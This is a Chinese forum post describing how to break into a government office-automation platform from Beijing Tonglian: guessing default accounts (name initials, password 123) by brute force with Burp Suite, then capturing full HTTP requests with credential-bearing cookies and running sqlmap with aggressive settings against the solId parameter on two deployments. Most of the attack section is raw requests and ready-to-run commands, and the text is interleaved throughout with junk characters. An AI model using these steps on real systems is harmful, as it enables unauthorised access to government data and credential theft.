|
+ u8 s9 H* y; W
; H+ \( f6 f* Y1 m3 Y2 ?8 w$ D
8 K2 D; U4 l& { J3 W. R: F. P) n9 T& Q. _# @: Y
平台简介:
4 }6 ]* t# r, c {) g c* m' p% W
! X6 I5 v7 Q* A
+ z& i1 X: N. R5 V: N* ] ( L. B& ?: Q# u# D8 F9 F# T
5 `6 T5 s& T1 M 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& v; X. i8 g$ ^. V
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
- c, M$ `! l8 p
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
2 c# R0 F: y+ G5 J! z% h- r9 _ A- c$ V " y5 `+ R9 s2 t, Y( i% O$ M$ u6 i. _; G
9 f% }" G* \, v1 e# e' l - ]" y8 ?/ _, ]2 r
2 ~ P+ X& c7 S5 o
2 Q/ Q+ h. \; x6 J5 f+ b 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:, Z" W+ ^. s+ ?! J! u
* B& D5 M. p: a9 [4 I* H; _
, H7 C6 G, B& w. F3 O6 R8 i- }
5 w( \; r$ ~ s( A* {! n; w3 ]
$ _7 w3 z- E. G) S, l7 J4 k" z
! N; b1 \ z4 j$ { http://1.1.1.1:7197/cap-aco/#(案例2-)' O; S- @- ?" l
+ _, O- A/ V- g; v+ }
# ^. k$ Y2 b4 m- R% F
http://www.XXOO.com (案例1-官网网站)
( g% @# f: R: k9 V _
/ E- P6 G- E2 d9 n) I
' D5 N- [5 g) U$ ] y 3 ?9 B" W2 Q v) ]) J3 A
/ L8 j. C3 ?: r& l) G! j4 [2 y, \ T% Q* l ]
漏洞详情:6 u# x: ? K, @ P3 B, f* _
2 q4 v. J7 C5 i) w% m
2 i$ E2 ]* w) ]" m/ J) C
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
+ {0 X. u( a) Z1 p2 w. @$ C
- c3 _# X, ?$ M6 ~7 V
/ P% d; L# g I. n9 p 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
5 K& t2 |+ K( j8 }4 Z; Z8 A+ z " D n: W7 o) Z
+ S/ r3 W9 e& d n
$ s1 `4 d( J; k8 I% q0 ~ S, A
9 Y: @. W: Z8 t
+ f; I% D8 K1 { 
! ~5 w+ q. C# i: r
6 u2 @, x) k! t% c% v5 m( D$ \1 q1 S; l; Z* O' y0 D; C- [
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
) H% B2 {6 l1 N' a ) e3 o6 W1 `& }. I8 m
- j& F6 ], B3 y& j, B 1、案例1-官方网站9 A& b5 o* |. J3 S) f
2 d+ b0 V, C) P( h
2 g9 L5 _! c7 p: y4 T. N0 w GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
4 w' j; s/ T6 X" d
5 O( g/ G& [6 f$ L2 M X1 v' x2 I5 n, \2 W% N; Z+ T$ [7 N
Host: www.XXOO.com
! d' D* j' p- {) N2 q1 ]: N) w9 ]. m
, W1 P8 x+ ]8 s% [8 k, `4 I
) I" G% s5 e: {# J: [- z) S3 ]& N Proxy-Connection: Keep-Alive; J- R) p9 I% D {
) ?6 L' [) z+ j+ y- w3 q
! e" l2 R4 J M( q* C& h Accept: application/json, text/javascript, */*; q=0.01& }# S) J$ p/ Z6 S6 F
1 o* J: P) a% H+ L! T. O$ I8 p; R
+ S, t) [& E/ i0 ?! [/ q- c Accept-Language: zh-CN( e1 {" s- P$ ~
3 J8 H0 c1 a) C, P# ?
% z# X+ D5 w& p) d* y/ w
Content-Type: application/json# r$ s+ T9 f1 i
7 ]" `* X8 K( }
( n3 v# Q, y `* g f9 l4 L8 P; x9 D User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
* `1 _" H8 C0 {& R, E
) F3 C) S0 g. d; \. O) C) k' V/ H5 b9 e3 i
X-Requested-With: XMLHttpRequest, w0 S' |' @% L. q2 l; s
; q. k7 f, ^1 ^* C- _9 G! i* C3 {
/ X6 o5 s" U+ S2 i Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002: r. l% U0 C2 c/ c @
, u7 y P( |& y3 @$ K. a5 w. h* i
% I& i( z' ]- h# q Accept-Encoding: gzip, deflate, sdch
# }3 S5 c; ^* E( U1 E P ( V9 f# o/ a7 K" I5 J j/ A$ m" J" C
8 U0 ^) s. x0 l Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
7 x% ? S: q6 R* u5 e0 Z A- X: q# Q0 t 4 Y2 U) c. ~! W
' B6 I, B+ }% O
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
- P7 S* |1 I5 D9 ~- ] v9 l |; P% a( n) R# u
7 D1 a, I2 C' F M \: {
 ! v; V: z2 d: A L5 {" w- P
' d9 E0 Z% {3 T( m
2 c9 l* B4 }: s) f, D: p) A 
& P: l1 a8 M7 W( f8 b ] # x+ Q- r5 e4 V7 k2 t! `2 E7 f; v
- L8 M6 k( L* d" a w( @9 \2 t5 l : T- r! ~% a7 @1 k
9 r7 _' U3 v/ @, b5 _' B) A1 n: v
$ Z1 A z/ g1 L" f* y# _
" l/ H. v( l" U( n6 q
$ d0 [1 T5 k+ F' ^. [) P
7 N' j9 A& ]9 ^3 a" m# ^
f4 e8 ^( f i! H5 o
/ }9 ?9 Q$ G' f% n 2、案例2-某天河云平台
1 F6 D( R# X/ k; A# n) k: K
& Q, G# g- Z$ D- r7 B* @4 T; U9 V
4 }. S6 A' Z) m. s7 W& v! ~ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1/ c7 [. m6 i, N8 `. o
$ T* A+ p) a3 @) M8 K: a8 V
% V& d8 j5 b7 Q Host: 1.1.1.:71974 R! W, o4 t4 U" ~
4 j2 v8 J: Y% C0 t
' J; m3 \( l0 ?3 d
Accept: application/json, text/javascript, */*; q=0.013 A, j; ]5 \- `2 i* S# x
- F. V% R# i6 g0 ~' x9 p% e$ p2 G: \ G! \) t2 D/ T
X-Requested-With: XMLHttpRequest% f9 j8 F4 A' e' v( E, H
0 M: N% ], W+ P/ z
1 }) B8 p4 X; U0 ^. F8 M: p$ g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0" t) @/ [$ G5 `3 d/ X' }
$ D4 B k' X0 d! L: [+ ~, q' D {$ h- X, I+ A) D6 f
Content-Type: application/json0 n; ]! O( J5 U6 F
) w+ x- Z, x5 u- d) A/ _
R8 {/ [2 i5 E" n Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008* K* X- {1 P7 L) r6 r/ E" v" a
3 f- _5 s/ w( f+ N3 V$ N) A1 d3 e7 Q6 X4 s, p' n
Accept-Language: zh-CN,zh;q=0.8+ S( q7 l7 X$ ]3 \7 \0 y
) f4 y* {7 i0 b9 T' V1 s4 _6 k$ }/ X! \9 C* f- b' }1 p ?: }
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=18 r9 I$ }6 q7 g+ X8 f
5 `( n9 }1 Y# [1 E' `9 n; J' p1 T
$ I+ y& h5 H [( g/ y& y3 A Connection: close
2 ^ [; K7 }! c- F1 J: S$ a$ `1 y
6 U0 b- |0 T$ l$ p5 k5 n% r1 j
+ ^& `* v4 \1 W$ B 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:& x- v; ^4 [ ?6 L
p. o6 y* u. T; Q9 Q
. Z; K; C$ N$ C8 P) ?; j. J
 ) S' P, K5 j' P z% l8 c
# u/ `9 u+ @ E3 z1 D
7 H$ E" m! e" R
9 T7 e9 }/ Q& |& |; ?
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对